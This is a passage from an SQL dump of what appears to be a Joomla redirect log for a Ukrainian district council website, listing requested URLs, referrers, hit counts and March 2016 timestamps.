00:00:00',301),(27343,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1356:2014-07-03-06-32-02','','','',1,0,'2016-03-19 01:46:40','0000-00-00 00:00:00',301),(27344,'http://malyn-rayrada.org.ua/index.php/1356-ogoloshennya?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-03-19 01:54:41','0000-00-00 00:00:00',301),(27345,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=888:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-19 16:48:13','0000-00-00 00:00:00',301),(27346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=434:2011-10-21-15-10-36&catid=37:--21102011-&Itemid=72&lang=uk','','','',11,0,'2016-03-19 18:09:53','0000-00-00 00:00:00',301),(27347,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/03_aaa.jpg','','','',1,0,'2016-03-19 18:14:30','0000-00-00 00:00:00',301),(27348,'http://www.malyn-rayrada.org.ua/index.php/1378-vitaemo-iz-svyatom-vesni','','','',13,0,'2016-03-19 19:19:08','0000-00-00 00:00:00',301),(27349,'http://www.malyn-rayrada.org.ua/index.php?id=33&Itemid=66&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-19 19:19:18','0000-00-00 00:00:00',301),(27350,'http://www.malyn-rayrada.org.ua/index.php?id=36:2011-07-21-07-51-53&Itemid=70&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-19 19:19:27','0000-00-00 00:00:00',301),(27351,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1291:2014-04-23-11-37-34&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-19 19:52:31','0000-00-00 00:00:00',301),(27352,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=639:2012-04-03-12-41-18&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-19 19:53:36','0000-00-00 00:00:00',301),(27353,'http://www.malyn-rayrada.org.ua/index.php?id=43&Itemid=82&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-03-19 19:53:38','0000-00-00 00:00:00',301),(27354,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-03-19 19:53:39','0000-00-00 00:00:00',301),(27355,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58:--30042014-&id=1304:2014-04-30-09-11-23&lang=ru','','','',2,0,'2016-03-19 19:59:43','0000-00-00 00:00:00',301),(27356,'http://www.malyn-rayrada.org.ua/index.php?id=47&Itemid=86&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-19 19:59:46','0000-00-00 00:00:00',301),(27357,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=872:2012-12-17-18-45-20&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-19 19:59:55','0000-00-00 00:00:00',301),(27358,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=699:--------------2011-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-03-19 20:57:45','0000-00-00 00:00:00',301),(27359,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=347:2011-06-15-12-33-18&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-19 21:38:49','0000-00-00 00:00:00',301),(27360,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=596:2012-02-28-12-59-05&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-19 21:53:06','0000-00-00 00:00:00',301),(27361,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1085:2013-09-11-12-15-54&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-20 02:54:22','0000-00-00 00:00:00',301),(27362,'http://malyn-rayrada.org.ua/index.php?option=com_vitabook','','','',3,0,'2016-03-20 04:25:21','0000-00-00 00:00:00',301),(27364,'http://www.malyn-rayrada.org.ua/index.php/1356-ogoloshennya?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-03-20 05:58:34','0000-00-00 00:00:00',301),(27365,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32:2011-03-31-12-03-04&id=642:2012-04-03-12-53-05&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-20 07:33:30','0000-00-00 00:00:00',301),(27366,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&__543__lang=en&id=49&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2016-03-20 10:07:58','0000-00-00 00:00:00',301),(27367,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-20 12:15:21','0000-00-00 00:00:00',301),(27368,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',3,0,'2016-03-20 13:28:07','0000-00-00 00:00:00',301),(27369,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1164:2013-12-29-11-46-36&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-20 13:28:25','0000-00-00 00:00:00',301),(27370,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-03-20 14:24:57','0000-00-00 00:00:00',301),(27371,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-20 14:26:32','0000-00-00 00:00:00',301),(27372,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1152:2013-11-28-14-58-05&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-03-20 14:28:08','0000-00-00 00:00:00',301),(27373,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=957:199-','','','',1,0,'2016-03-20 14:44:23','0000-00-00 00:00:00',301),(27374,'http://www.malyn-rayrada.org.ua/index.php?id=33&Itemid=66&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-03-20 14:49:57','0000-00-00 00:00:00',301),(27375,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1257:2014-03-29-18-03-31&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-20 14:58:34','0000-00-00 00:00:00',301),(27376,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=598:2012-02-29-14-13-44&lang=en&option=com_content&view=article','','','',2,0,'2016-03-20 15:01:01','0000-00-00 00:00:00',301),(27377,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=579:-2011-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-20 16:02:57','0000-00-00 00:00:00',301),(27378,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2016-03-20 16:38:43','0000-00-00 00:00:00',301),(27379,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=15','','','',3,0,'2016-03-20 16:48:29','0000-00-00 00:00:00',301),(27380,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=513:-lr-2012-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',1,0,'2016-03-20 18:42:22','0000-00-00 00:00:00',301),(27381,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=892:2013-01-08-13-26-18&Itemid=&lang=en&option=com_content&view=article','','','',10,0,'2016-03-20 18:57:36','0000-00-00 00:00:00',301),(27382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=348:2011-06-15-12-35-38&catid=34&Itemid=68&lang=ru','','','',4,0,'2016-03-20 22:43:49','0000-00-00 00:00:00',301),(27383,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1215:-1200-&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-21 00:33:47','0000-00-00 00:00:00',301),(27384,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=436:------l-r--2007-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-21 00:40:42','0000-00-00 00:00:00',301),(27385,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1024:-l-2011-2014-r-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-21 03:19:41','0000-00-00 00:00:00',301),(27386,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=909:2013-01-21-10-09-40&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-21 04:56:13','0000-00-00 00:00:00',301),(27387,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=941:2013-02-27-14-30-15&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-21 06:43:19','0000-00-00 00:00:00',301),(27389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=731:2012-07-02-08-51-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-03-21 10:51:36','0000-00-00 00:00:00',301),(27390,'http://www.malyn-rayrada.org.ua/index.php?id=43:--25072012-&Itemid=82&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-03-21 10:52:38','0000-00-00 00:00:00',301),(27391,'http://www.malyn-rayrada.org.ua/index.php?id=49&Itemid=88&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-03-21 10:52:46','0000-00-00 00:00:00',301),(27392,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=275:---------------2011-&Itemid=62&lang=en&option=com_content&view=article','','','',1,0,'2016-03-21 10:55:27','0000-00-00 00:00:00',301),(27393,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58&id=1304:2014-04-30-09-11-23&lang=ru','','','',1,0,'2016-03-21 10:55:48','0000-00-00 00:00:00',301),(27394,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/687-2012-05-24-11-21-04?lang=en','','','',1,0,'2016-03-21 12:06:14','0000-00-00 00:00:00',301),(27395,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=593:-lr&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-21 12:12:20','0000-00-00 00:00:00',301),(27396,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1130:2013-11-07-14-04-12','','','',1,0,'2016-03-21 12:23:07','0000-00-00 00:00:00',301),(27397,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=738:-c-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-21 12:47:42','0000-00-00 00:00:00',301),(27398,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-21 12:54:46','0000-00-00 00:00:00',301),(27399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=138:2010-10-12-13-10-21&catid=11&Itemid=16&lang=uk','','','',4,0,'2016-03-21 13:05:28','0000-00-00 00:00:00',301),(27400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=46:2010-06-16-14-08-26&catid=1:-14052010&Itemid=10&lang=ru','','','',3,0,'2016-03-21 13:06:26','0000-00-00 00:00:00',301),(27401,'http://www.malyn-rayrada.org.ua/create-an-account.html','','http://www.malyn-rayrada.org.ua/create-an-account.html','',1,0,'2016-03-21 13:27:46','0000-00-00 00:00:00',301),(27402,'http://www.malyn-rayrada.org.ua/index.php/using-joomla/extensions/components/users-component/registration-form','','http://www.malyn-rayrada.org.ua/index.php/using-joomla/extensions/components/users-component/registration-form','',1,0,'2016-03-21 15:52:16','0000-00-00 00:00:00',301),(27403,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1010:-22-6-&lang=en&option=com_content&view=article','','','',1,0,'2016-03-21 15:58:00','0000-00-00 00:00:00',301),(27404,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34:--15062011-&id=345:2011-06-15-12-28-17&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-21 16:20:48','0000-00-00 00:00:00',301),(27405,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-21 16:43:41','0000-00-00 00:00:00',301),(27406,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=976:2013-03-21-18-42-06&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-21 16:49:29','0000-00-00 00:00:00',301),(27407,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=194:-----------2008-2010-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-21 16:56:30','0000-00-00 00:00:00',301),(27408,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/','','http://go.mail.ru/search_images','',1,0,'2016-03-21 17:02:14','0000-00-00 00:00:00',301),(27409,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1053:2013-07-19-11-34-22&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-21 17:16:50','0000-00-00 00:00:00',301),(27410,'http://www.malyn-rayrada.org.ua/index.php?Itemid=93&catid=52:--16082013-&id=1067:2013-08-16-15-28-50&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-21 17:35:51','0000-00-00 00:00:00',301),(27411,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=730:2012-07-02-05-04-18&lang=ru&option=com_content&view=article','','','',4,0,'2016-03-21 20:02:33','0000-00-00 00:00:00',301),(27412,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&id=55:--26122013-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-21 21:03:17','0000-00-00 00:00:00',301),(27413,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=679:2012-05-17-10-00-53&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-21 21:24:35','0000-00-00 00:00:00',301),(27414,'http://www.malyn-rayrada.org.ua/index.php?Itemid=83&id=44:--12092012-&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-21 22:28:40','0000-00-00 00:00:00',301),(27415,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=963:2013-03-13-06-16-53&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-21 23:04:24','0000-00-00 00:00:00',301),(27416,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51:--19072013-&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-22 01:57:38','0000-00-00 00:00:00',301),(27417,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1098:2013-09-25-09-34-57&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-22 02:21:02','0000-00-00 00:00:00',301),(27418,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=867:2012-12-14-10-13-30&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-22 03:28:47','0000-00-00 00:00:00',301),(27419,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=905:-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-22 03:51:24','0000-00-00 00:00:00',301),(27420,'http://www.malyn-rayrada.org.ua/index.php?Itemid=33&catid=13:2010-06-06-03-57-58&id=13:2010-06-06-04-07-00&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-22 04:32:53','0000-00-00 00:00:00',301),(27421,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2016-03-22 04:46:15','0000-00-00 00:00:00',301),(27422,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=455:2011-11-10-13-39-05&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-22 04:50:39','0000-00-00 00:00:00',301),(27423,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58:--30042014-&id=1244:-2014-2018-&lang=ru','','','',2,0,'2016-03-22 05:52:17','0000-00-00 00:00:00',301),(27425,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-22 09:36:10','0000-00-00 00:00:00',301),(27426,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1049:2013-07-15-05-50-46&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-22 10:02:24','0000-00-00 00:00:00',301),(27427,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=ru&limitstart=5','','','',5,0,'2016-03-22 12:27:44','0000-00-00 00:00:00',301),(27428,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-22 12:44:43','0000-00-00 00:00:00',301),(27429,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/997-pro-vstanovlennya-nadbavki-do-posadovogo-okladu-premiyuvannya-ta-nadannya-materialnoji-dopomogi-golovi-rajonnoji-radi-ta-zastupniku-golovi-rajonnoji-radi-u-2015-rotsi','','','',1,0,'2016-03-22 14:38:11','0000-00-00 00:00:00',301),(27430,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=563:-30012012185-12&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-22 14:51:24','0000-00-00 00:00:00',301),(27431,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&id=54:--29112013-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-22 17:04:04','0000-00-00 00:00:00',301),(27432,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=en&layout=blog&limitstart=25&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-22 17:25:02','0000-00-00 00:00:00',301),(27433,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','http://go.mail.ru/search_images','',2,0,'2016-03-22 17:51:09','0000-00-00 00:00:00',301),(27434,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-22 18:55:20','0000-00-00 00:00:00',301),(27435,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34:--15062011-&id=346:2011-06-15-12-31-02&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-22 18:59:12','0000-00-00 00:00:00',301),(27436,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=193:------------2009-2010-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-22 19:11:07','0000-00-00 00:00:00',301),(27437,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&catid=5&id=166:-6-&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-22 20:13:21','0000-00-00 00:00:00',301),(27438,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&__543__lang=en&id=49&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-22 20:26:09','0000-00-00 00:00:00',301),(27439,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=712:2012-06-14-15-11-24&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-22 20:32:20','0000-00-00 00:00:00',301),(27440,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1277:-2014-&Itemid=98&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-22 20:33:42','0000-00-00 00:00:00',301),(27441,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=uk&layout=blog&limitstart=40&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-22 20:49:17','0000-00-00 00:00:00',301),(27442,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1022:-------lr---&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-03-22 21:12:39','0000-00-00 00:00:00',301),(27443,'http://www.malyn-rayrada.org.ua/index.php?id=36&Itemid=70&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2016-03-22 21:13:01','0000-00-00 00:00:00',301),(27444,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=804:2012-10-28-18-37-40&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-22 21:37:45','0000-00-00 00:00:00',301),(27445,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&id=59:--20062014-&lang=ru&layout=blog&option=com_content&view=category','','','',4,0,'2016-03-22 22:12:45','0000-00-00 00:00:00',301),(27446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=en&Itemid=','','','',7,0,'2016-03-22 22:46:45','0000-00-00 00:00:00',301),(27447,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=840:-2007-2015-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-22 22:57:47','0000-00-00 00:00:00',301),(27448,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1191:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-23 00:26:07','0000-00-00 00:00:00',301),(27449,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1015:-200-&lang=ru&option=com_content&view=article','','','',5,0,'2016-03-23 01:27:24','0000-00-00 00:00:00',301),(27450,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 02:53:33','0000-00-00 00:00:00',301),(27451,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1097:2013-09-25-08-35-50&lang=en&option=com_content&view=article','','','',2,0,'2016-03-23 02:54:12','0000-00-00 00:00:00',301),(27452,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 03:08:44','0000-00-00 00:00:00',301),(27453,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&id=49:--12042013-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 03:17:41','0000-00-00 00:00:00',301),(27454,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 04:20:39','0000-00-00 00:00:00',301),(27455,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=824:-2012-&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-23 05:14:05','0000-00-00 00:00:00',301),(27456,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 05:24:01','0000-00-00 00:00:00',301),(27457,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1075:2013-09-06-09-25-33&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-23 05:43:58','0000-00-00 00:00:00',301),(27458,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=969:-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',1,0,'2016-03-23 05:45:08','0000-00-00 00:00:00',301),(27459,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=546:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-23 06:25:13','0000-00-00 00:00:00',301),(27460,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=702:-2011-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-23 06:25:13','0000-00-00 00:00:00',301),(27461,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1061-pro-zvernennya-do-prem-er-ministra-ukrajini-shchodo-vstanovlennya-pilgovikh-tarifiv-na-prirodnij-gaz-ta-elektroenergiyu-dlya-naselennya-yake-prozhivae-v-silskij-mistsevosti','','','',1,0,'2016-03-23 07:44:34','0000-00-00 00:00:00',301),(27462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=343:-2011-&catid=34&Itemid=68&lang=uk','','','',1,0,'2016-03-23 07:47:52','0000-00-00 00:00:00',301),(27463,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1278:2014-04-11-13-44-30&Itemid=&lang=ru&option=com_content&view=article','','','',7,0,'2016-03-23 08:33:25','0000-00-00 00:00:00',301),(27464,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=941:2013-02-27-14-30-15&lang=en&option=com_content&view=article','','','',1,0,'2016-03-23 09:39:02','0000-00-00 00:00:00',301),(27465,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 09:58:11','0000-00-00 00:00:00',301),(27466,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56:--03022014-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 10:24:10','0000-00-00 00:00:00',301),(27467,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47&layout=blog&Itemid=86&lang=en','','','',1,0,'2016-03-23 10:25:42','0000-00-00 00:00:00',301),(27468,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=825:-q-q&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-23 10:46:15','0000-00-00 00:00:00',301),(27469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=en','','','',2,0,'2016-03-23 11:09:44','0000-00-00 00:00:00',301),(27470,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 11:30:09','0000-00-00 00:00:00',301),(27471,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1190:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-23 13:02:49','0000-00-00 00:00:00',301),(27472,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-23 13:06:18','0000-00-00 00:00:00',301),(27473,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=862:-qq&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-23 13:42:48','0000-00-00 00:00:00',301),(27474,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=504:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-24 10:37:37','0000-00-00 00:00:00',301),(27475,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1372-pro-reformuvannya-drukovanogo-zasobu-masovoji-informatsiji-ta-redaktsiji-zasnovnikami-spivzasnovnikami-yakikh-e-malinska-rajonna-rada','','https://www.google.com.ua/','',35,0,'2016-03-24 11:33:44','0000-00-00 00:00:00',301),(27476,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-24 11:52:34','0000-00-00 00:00:00',301),(27477,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=861:-qq&lang=en&option=com_content&view=article','','','',1,0,'2016-03-24 12:06:15','0000-00-00 00:00:00',301),(27478,'http://www.malyn-rayrada.org.ua/index.php?Itemid=33&catid=13&id=13:2010-06-06-04-07-00&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-24 12:07:55','0000-00-00 00:00:00',301),(27479,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-03-24 12:14:47','0000-00-00 00:00:00',301),(27480,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=490:2011-12-02-09-02-47&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-24 12:49:05','0000-00-00 00:00:00',301),(27481,'http://www.malyn-rayrada.org.ua/index.php?option=com_user&view=reset&layout=confirm','','','',1,0,'2016-03-24 13:46:45','0000-00-00 